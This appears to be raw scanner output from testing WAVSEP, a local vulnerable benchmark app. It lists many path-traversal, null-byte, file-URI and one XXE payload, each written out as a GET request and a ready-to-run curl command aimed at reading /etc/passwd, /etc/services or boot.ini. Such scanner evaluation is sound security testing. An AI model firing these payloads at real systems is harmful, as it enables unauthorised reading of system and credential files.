GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
